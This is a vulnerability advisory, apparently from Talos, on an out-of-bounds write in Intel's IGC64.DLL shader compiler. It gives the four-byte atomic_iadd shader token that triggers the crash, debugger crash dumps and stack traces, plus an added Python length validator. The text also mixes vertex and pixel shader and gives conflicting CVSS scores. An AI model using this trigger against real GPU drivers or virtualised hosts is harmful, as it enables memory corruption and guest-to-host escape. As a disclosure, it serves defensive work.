TALOS-2020-0979: Intel IGC64.DLL shader functionality ATOMIC_ADD code execution vulnerability

Published: Jul 14, 2020
Source: Talos Intelligence (www.talosintelligence.com)
Tags: intel, igc64.dll, atomic_add, code execution, vulnerability, vertex shader, memory corruption, out-of-bounds write, guest-to-host escape, virtualization environments, web browser, webgl, webassembly, shader functionality

CVSS2: 7.7 (AV:A/AC:L/Au:S/C:C/I:C/A:C)
  Attack Vector:          ADJACENT_NETWORK
  Attack Complexity:      LOW
  Authentication:         SINGLE
  Confidentiality Impact: COMPLETE
  Integrity Impact:       COMPLETE
  Availability Impact:    COMPLETE

CVSS3: 9 (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
  Attack Vector:          ADJACENT
  Attack Complexity:      LOW
  Privileges Required:    LOW
  User Interaction:       NONE
  Scope:                  CHANGED
  Confidentiality Impact: HIGH
  Integrity Impact:       HIGH
  Availability Impact:    HIGH

AI Score: 9.3 (Confidence: High)
EPSS: 0.002 (Percentile: 57.8%)

Summary

An exploitable memory corruption vulnerability exists in Intel's IGC64.DLL graphics driver, version 26.20.100.7584. A specially crafted vertex shader can cause an out-of-bounds write, which could lead to arbitrary code execution. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability could potentially be triggered from guest machines running on virtualization environments (e.g. VMware, QEMU, VirtualBox, etc.) to perform a guest-to-host escape, as was demonstrated previously in TALOS-2018-0533, TALOS-2018-0568, etc. Theoretically, this vulnerability could also be triggered from a web browser (using WebGL and WebAssembly), but Talos has not been able to confirm this.

Tested Versions

Intel IGC64.DLL (Intel Graphics Shader Compiler for Intel® Graphics Accelerator), version 26.20.100.7584
Microsoft Hyper-V with RemoteFX enabled (CVE-2020-1036)

Product URLs

http://intel.com

CVSSv3 Score

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-787: Out-of-bounds Write

Details

This vulnerability can be triggered by supplying a malformed vertex shader, leading to an out-of-bounds write in the Intel IGC64 driver (this driver is mapped into the address space of the affected component, e.g. VMware's vmware-vmx.exe).

Example of a pixel shader that triggers the bug (a shader containing only this one instruction is sufficient):

LEN:0004 ad 00 00 01 atomic_iadd

ATOMIC_ADD is an instruction in the Shader Model 5 language, designed to atomically add an integer to a memory location.
Emitting this single instruction is enough to cause an arbitrary memory write:

igc64!OpenCompiler12+338c0
00007ffc`7133b050 c681d000000000  mov     byte ptr [rcx+0D0h],0
WRITE_ADDRESS:  00000173c8c800d0 
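To see why the four bytes above are malformed, the following added example (not Talos' code, and not the IGC64 compiler's logic) decodes them as a Shader Model 4/5 opcode token using the field layout from Microsoft's d3d11TokenizedProgramFormat.h and checks the declared instruction length against the operand count the opcode needs. The opcode-name and minimum-operand tables are assumptions taken from that format (atomic_iadd takes dst, dstAddress and src0); a front-end that performs this kind of length check rejects the token before it ever reaches the compiler.

```python
# Added example: decode an SM4/SM5 opcode token and sanity-check its length.
import struct

# Opcode numbers from the SM5 tokenized format (assumed from the header);
# 0xad is the atomic_iadd token printed in the advisory.
OPCODE_NAMES = {0xa9: "atomic_and", 0xaa: "atomic_or", 0xab: "atomic_xor",
                0xac: "atomic_cmp_store", 0xad: "atomic_iadd",
                0xae: "atomic_imax", 0xaf: "atomic_imin"}
# Minimum operand count per opcode, e.g. atomic_iadd dst, dstAddress, src0.
MIN_OPERANDS = {0xa9: 3, 0xaa: 3, 0xab: 3, 0xac: 4, 0xad: 3, 0xae: 3, 0xaf: 3}


def decode_opcode_token(dword):
    """Split one 32-bit opcode token into its fields."""
    return {
        "opcode": dword & 0x7ff,                # bits [10:0]  opcode type
        "controls": (dword >> 11) & 0x1fff,     # bits [23:11] opcode-specific
        "length_dwords": (dword >> 24) & 0x7f,  # bits [30:24] incl. this token
        "extended": bool(dword >> 31),          # bit 31: extended token follows
    }


def check_instruction(raw):
    """Decode the first token of `raw` and report whether the declared
    length can hold the operands the opcode requires (every operand token
    is at least one DWORD). Returns (name, length_in_bytes, well_formed)."""
    if len(raw) < 4:
        raise ValueError("truncated opcode token")
    tok = decode_opcode_token(struct.unpack_from("<I", raw)[0])
    name = OPCODE_NAMES.get(tok["opcode"], f"opcode_{tok['opcode']:#x}")
    # One DWORD for the opcode token, one more if an extended token follows,
    # then at least one DWORD per required operand.
    need = 1 + int(tok["extended"]) + MIN_OPERANDS.get(tok["opcode"], 0)
    fits_buffer = tok["length_dwords"] * 4 <= len(raw)
    well_formed = tok["length_dwords"] >= need and fits_buffer
    return name, tok["length_dwords"] * 4, well_formed


# The single instruction from the advisory, bytes exactly as printed there
# ("LEN:0004 ad 00 00 01"): little-endian DWORD 0x010000ad.
CRASHING_TOKEN = bytes.fromhex("ad000001")

# Constructed comparison: same opcode, declared length 4 DWORDs, with three
# zeroed operand DWORDs following, which is what the length check expects.
WELL_SIZED_TOKEN = struct.pack("<I", 0x040000ad) + b"\x00" * 12

if __name__ == "__main__":
    for label, blob in (("advisory", CRASHING_TOKEN), ("sized", WELL_SIZED_TOKEN)):
        print(label, check_instruction(blob))
```

The advisory token decodes to atomic_iadd with a declared length of one DWORD, i.e. no operand tokens at all, which is exactly the shape a validator should refuse.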

Stack trace:

0:000> kb
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffc`713344e3 : 00000173`c67ef750 00000173`c67e760c 00000173`c67e7624 00000173`c67e7628 : igc64!OpenCompiler12+0x338c0
01 00007ffc`713341a3 : 00000000`00000000 00000173`c67f0da0 00000173`c67ef750 00000173`c67e760c : igc64!OpenCompiler12+0x2cd53
02 00007ffc`7133406f : 00000173`c67e760c 00000173`c67e760c 00000173`c67e760c 00000173`c67eee50 : igc64!OpenCompiler12+0x2ca13
03 00007ffc`7130c37a : 00000173`c67e98e0 00000173`c67e9a00 00000173`c67e9a00 00000173`c67e9a00 : igc64!OpenCompiler12+0x2c8df
04 00007ffc`7130b6cd : 00000000`00000000 00000173`c67e80c8 00000067`b20fcac0 00007ffc`837dbabb : igc64!OpenCompiler12+0x4bea
05 00007ffc`7130cbf3 : 00000173`c67e8098 00007ffc`75013537 00000173`c67e8150 00000000`00000000 : igc64!OpenCompiler12+0x3f3d
06 00007ffc`748f7946 : 00000173`c67e7fb0 00000000`00000000 00000173`c6720d50 00000000`00000001 : igc64!OpenCompiler12+0x5463
07 00007ffc`750bb966 : 00000173`bfa16080 00000173`c67e7a50 00000173`c67e9720 00000067`b20fc620 : igd10iumd64!OpenAdapter10_2+0x30326
08 00007ffc`7cc28edc : 00000000`00000000 00000173`c67e7a38 00000173`c6716e30 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x7f4346
09 00007ffc`7cc3295f : 00000067`00000001 00000173`c6720d48 00000173`c67e7a38 00000173`c6716e30 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
0a 00007ffc`7cc3289a : 00000067`b20fe3e0 00007ffc`3ff47a18 00000173`c67e7660 00000173`bf990320 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
0b 00007ffc`7cc1ee58 : 00000173`c67e7928 00000067`b20fe3e0 00000067`b20fe360 00007ffc`3ff47a18 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
0c 00007ffc`7cc2b17d : 00000000`00000040 00000173`c67e76a8 00000173`bf989a70 00000067`0c040109 : d3d11!CDevice::CreateLayeredChild+0xc88
0d 00007ffc`3fed3ade : 00000173`c67e76a8 00000000`00000000 00000000`00000000 00000000`00000009 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
0e 00007ffc`3fec0d83 : 00000173`c67e7758 00000000`00000000 00000000`00000000 00000173`c67e7660 : D3D11_3SDKLayers!NDebug::CDeviceChild<ID3D11PixelShader>::FinalConstruct+0x82
0f 00007ffc`3fe7da23 : 00000173`c67e7690 00000173`c67e7688 00000173`c67e7688 00000173`c67e7660 : D3D11_3SDKLayers!CLayeredObject<NDebug::CPixelShader>::CreateInstance+0x167
10 00007ffc`7cc2b950 : 00000173`c67e7660 00000000`00000030 00000067`b20fe4d0 00000173`bf990000 : D3D11_3SDKLayers!NDebug::CDevice::CreateLayeredChild+0x773
11 00007ffc`7cc114f4 : 00000173`c670e350 00000067`00000009 00000173`c67e7570 00000173`c670f1e8 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
12 00007ffc`7cc11463 : 00000173`c67e7570 00000000`0000c100 00000000`00000000 00000000`00000001 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
13 00007ffc`7cc111e8 : 00000173`c670f1e8 00000173`c67e7570 00000000`000000b8 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
14 00007ffc`3fea9f85 : 00000173`c670e3a8 00000173`00000001 00000173`c670e3a8 00000173`c670e3b0 : d3d11!CDevice::CreatePixelShader+0x28

Crash Information

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


KEY_VALUES_STRING: 1

	Key  : AV.Fault
	Value: Write

	Key  : Analysis.CPU.Sec
	Value: 1

	Key  : Analysis.Elapsed.Sec
	Value: 96

	Key  : Analysis.Memory.CommitPeak.Mb
	Value: 72

	Key  : Timeline.OS.Boot.DeltaSec
	Value: 126392

	Key  : Timeline.Process.Start.DeltaSec
	Value: 46


PROCESSES_ANALYSIS: 1

SERVICE_ANALYSIS: 1

STACKHASH_ANALYSIS: 1

TIMELINE_ANALYSIS: 1

Timeline: !analyze.Start
	Name: <blank>
	Time: 2020-01-12T14:36:38.911Z
	Diff: 88 mSec

Timeline: Dump.Current
	Name: <blank>
	Time: 2020-01-12T14:36:39.0Z
	Diff: 0 mSec

Timeline: Process.Start
	Name: <blank>
	Time: 2020-01-12T14:35:53.0Z
	Diff: 46000 mSec

Timeline: OS.Boot
	Name: <blank>
	Time: 2020-01-11T03:30:07.0Z
	Diff: 126392000 mSec


DUMP_CLASS: 2

DUMP_QUALIFIER: 0

MODLIST_WITH_TSCHKSUM_HASH:  68520726b589446b188e9a1fa156e8f36ea4808b

MODLIST_SHA1_HASH:  a128a094da68947a63ade4a350e9f21c32a899c7

NTGLOBALFLAG:  70

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  272

DUMP_TYPE:  fe

FAULTING_IP: 
igc64!OpenCompiler12+338c0
00007ffc`7133b050 c681d000000000  mov     byte ptr [rcx+0D0h],0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffc7133b050 (igc64!OpenCompiler12+0x00000000000338c0)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000001
   Parameter[1]: 00000173c8c800d0
Attempt to write to address 00000173c8c800d0

FAULTING_THREAD:  00003b00

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE

PROCESS_NAME:  SimpleBezier11.exe

FOLLOWUP_IP: 
igc64!OpenCompiler12+338c0
00007ffc`7133b050 c681d000000000  mov     byte ptr [rcx+0D0h],0

WRITE_ADDRESS:  00000173c8c800d0 

ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si  do pami ci pod adresem 0x%p. Pami   nie mo e by  %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si  do pami ci pod adresem 0x%p. Pami   nie mo e by  %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000001

EXCEPTION_PARAMETER2:  00000173c8c800d0

WATSON_BKT_PROCSTAMP:  5e1a4ea8

WATSON_BKT_MODULE:  igc64.dll

WATSON_BKT_MODSTAMP:  5ddcfccd

WATSON_BKT_MODOFFSET:  a7b050

WATSON_BKT_MODVER:  26.20.100.7584

MODULE_VER_PRODUCT:  Intel HD Graphics Drivers for Windows(R)

BUILD_VERSION_STRING:  18362.1.amd64fre.19h1_release.190318-1202

ANALYSIS_SESSION_HOST:  IAMLEGION

ANALYSIS_SESSION_TIME:  01-12-2020 15:36:38.0911

ANALYSIS_VERSION: 10.0.18914.1001 amd64fre

THREAD_ATTRIBUTES: 
OS_LOCALE:  PLK

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

PROBLEM_CLASSES: 

	ID:     [0n313]
	Type:   [@ACCESS_VIOLATION]
	Class:  Addendum
	Scope:  BUCKET_ID
	Name:   Omit
	Data:   Omit
	PID:    [Unspecified]
	TID:    [0x3b00]
	Frame:  [0] : igc64!OpenCompiler12

	ID:     [0n286]
	Type:   [INVALID_POINTER_WRITE]
	Class:  Primary
	Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
			BUCKET_ID
	Name:   Add
	Data:   Omit
	PID:    [Unspecified]
	TID:    [0x3b00]
	Frame:  [0] : igc64!OpenCompiler12

LAST_CONTROL_TRANSFER:  from 00007ffc713344e3 to 00007ffc7133b050

STACK_TEXT:  
00000067`b20f66c0 00007ffc`713344e3 : 00000173`c67ef750 00000173`c67e760c 00000173`c67e7624 00000173`c67e7628 : igc64!OpenCompiler12+0x338c0
00000067`b20fc170 00007ffc`713341a3 : 00000000`00000000 00000173`c67f0da0 00000173`c67ef750 00000173`c67e760c : igc64!OpenCompiler12+0x2cd53
00000067`b20fc1b0 00007ffc`7133406f : 00000173`c67e760c 00000173`c67e760c 00000173`c67e760c 00000173`c67eee50 : igc64!OpenCompiler12+0x2ca13
00000067`b20fc2b0 00007ffc`7130c37a : 00000173`c67e98e0 00000173`c67e9a00 00000173`c67e9a00 00000173`c67e9a00 : igc64!OpenCompiler12+0x2c8df
00000067`b20fc340 00007ffc`7130b6cd : 00000000`00000000 00000173`c67e80c8 00000067`b20fcac0 00007ffc`837dbabb : igc64!OpenCompiler12+0x4bea
00000067`b20fc3c0 00007ffc`7130cbf3 : 00000173`c67e8098 00007ffc`75013537 00000173`c67e8150 00000000`00000000 : igc64!OpenCompiler12+0x3f3d
00000067`b20fc480 00007ffc`748f7946 : 00000173`c67e7fb0 00000000`00000000 00000173`c6720d50 00000000`00000001 : igc64!OpenCompiler12+0x5463
00000067`b20fc4c0 00007ffc`750bb966 : 00000173`bfa16080 00000173`c67e7a50 00000173`c67e9720 00000067`b20fc620 : igd10iumd64!OpenAdapter10_2+0x30326
00000067`b20fc520 00007ffc`7cc28edc : 00000000`00000000 00000173`c67e7a38 00000173`c6716e30 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x7f4346
00000067`b20fc950 00007ffc`7cc3295f : 00000067`00000001 00000173`c6720d48 00000173`c67e7a38 00000173`c6716e30 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
00000067`b20fcbb0 00007ffc`7cc3289a : 00000067`b20fe3e0 00007ffc`3ff47a18 00000173`c67e7660 00000173`bf990320 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
00000067`b20fcc40 00007ffc`7cc1ee58 : 00000173`c67e7928 00000067`b20fe3e0 00000067`b20fe360 00007ffc`3ff47a18 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
00000067`b20fcca0 00007ffc`7cc2b17d : 00000000`00000040 00000173`c67e76a8 00000173`bf989a70 00000067`0c040109 : d3d11!CDevice::CreateLayeredChild+0xc88
00000067`b20fd0e0 00007ffc`3fed3ade : 00000173`c67e76a8 00000000`00000000 00000000`00000000 00000000`00000009 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
00000067`b20fd250 00007ffc`3fec0d83 : 00000173`c67e7758 00000000`00000000 00000000`00000000 00000173`c67e7660 : D3D11_3SDKLayers!NDebug::CDeviceChild<ID3D11PixelShader>::FinalConstruct+0x82
00000067`b20fe2e0 00007ffc`3fe7da23 : 00000173`c67e7690 00000173`c67e7688 00000173`c67e7688 00000173`c67e7660 : D3D11_3SDKLayers!CLayeredObject<NDebug::CPixelShader>::CreateInstance+0x167
00000067`b20fe3a0 00007ffc`7cc2b950 : 00000173`c67e7660 00000000`00000030 00000067`b20fe4d0 00000173`bf990000 : D3D11_3SDKLayers!NDebug::CDevice::CreateLayeredChild+0x773
00000067`b20fe490 00007ffc`7cc114f4 : 00000173`c670e350 00000067`00000009 00000173`c67e7570 00000173`c670f1e8 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
00000067`b20fe680 00007ffc`7cc11463 : 00000173`c67e7570 00000000`0000c100 00000000`00000000 00000000`00000001 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
00000067`b20fe6e0 00007ffc`7cc111e8 : 00000173`c670f1e8 00000173`c67e7570 00000000`000000b8 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
00000067`b20fe890 00007ffc`3fea9f85 : 00000173`c670e3a8 00000173`00000001 00000173`c670e3a8 00000173`c670e3b0 : d3d11!CDevice::CreatePixelShader+0x28
00000067`b20fe8e0 00007ff7`2dad8f49 : 00000000`00000000 00000000`00000000 00000067`b20fe9b8 00000173`c67e7584 : D3D11_3SDKLayers!NDebug::CDevice::CreatePixelShader+0x115
00000067`b20fe950 00007ff7`2dad6bd4 : 00000173`c670e3b0 00000173`bf9a34d0 00000173`00000000 00007ff7`2dd03030 : SimpleBezier11+0x58f49
00000067`b20febb0 00007ff7`2da9f70e : 00000173`c670e3b0 00000173`bf9daeb0 00000000`00000000 00000000`00000000 : SimpleBezier11+0x56bd4
00000067`b20fefb0 00007ff7`2da9bea2 : 00000173`bfa16320 00000173`bfa16301 00000000`00000000 00000000`00000000 : SimpleBezier11+0x1f70e
00000067`b20ff250 00007ff7`2da9821c : 00000173`bfa16320 00470055`00000201 0065006d`005f0032 00720077`005f006d : SimpleBezier11+0x1bea2
00000067`b20ff640 00007ff7`2dad515b : 00007ff7`0000b000 00007ff7`2da80001 ffffffff`00000320 00000000`00000258 : SimpleBezier11+0x1821c
00000067`b20ff840 00007ff7`2db283bd : 00007ff7`2da80000 00000000`00000000 00000173`bf993afc 00007ff7`0000000a : SimpleBezier11+0x5515b
00000067`b20ff8f0 00007ff7`2db2826e : 00007ff7`2db42000 00007ff7`2db423a0 00000000`00000000 00000000`00000000 : SimpleBezier11+0xa83bd
00000067`b20ff930 00007ff7`2db2812e : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : SimpleBezier11+0xa826e
00000067`b20ff9a0 00007ff7`2db28449 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : SimpleBezier11+0xa812e
00000067`b20ff9d0 00007ffc`82497bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : SimpleBezier11+0xa8449
00000067`b20ffa00 00007ffc`8380ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000067`b20ffa30 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


STACK_COMMAND:  ~0s ; .cxr ; kb

THREAD_SHA1_HASH_MOD_FUNC:  35432efb24038964cffc57d4452411c4eec32c8c

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  c6f1f2b85e5669d833f4df518bd941305a60161c

THREAD_SHA1_HASH_MOD:  b69d115479d8aa2381c6e13353a51f982422c1d8

FAULT_INSTR_CODE:  d081c6

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  igc64!OpenCompiler12+338c0

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: igc64

IMAGE_NAME:  igc64.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  5ddcfccd

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_igc64.dll!OpenCompiler12

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_igc64!OpenCompiler12+338c0

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  igc64.dll

BUCKET_ID_IMAGE_STR:  igc64.dll

FAILURE_MODULE_NAME:  igc64

BUCKET_ID_MODULE_STR:  igc64

FAILURE_FUNCTION_NAME:  OpenCompiler12

BUCKET_ID_FUNCTION_STR:  OpenCompiler12

BUCKET_ID_OFFSET:  338c0

BUCKET_ID_MODTIMEDATESTAMP:  5ddcfccd

BUCKET_ID_MODCHECKSUM:  2450ddb

BUCKET_ID_MODVER_STR:  26.20.100.7584

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  igc64.dll!OpenCompiler12

TARGET_TIME:  2020-01-12T14:38:15.000Z

OSBUILD:  18362

OSSERVICEPACK:  329

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  190318-1202

BUILDLAB_STR:  19h1_release

BUILDOSVER_STR:  10.0.18362.1.amd64fre.19h1_release.190318-1202

ANALYSIS_SESSION_ELAPSED_TIME:  17987

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_c0000005_igc64.dll!opencompiler12

FAILURE_ID_HASH:  {1c89f3a6-178c-7483-67bb-857d785cefd5}

Followup:     MachineOwner
---------

Timeline

2020-01-27 - Vendor Disclosure
2020-04-01 - Disclosure deadline extended
2020-07-14 - Public Release
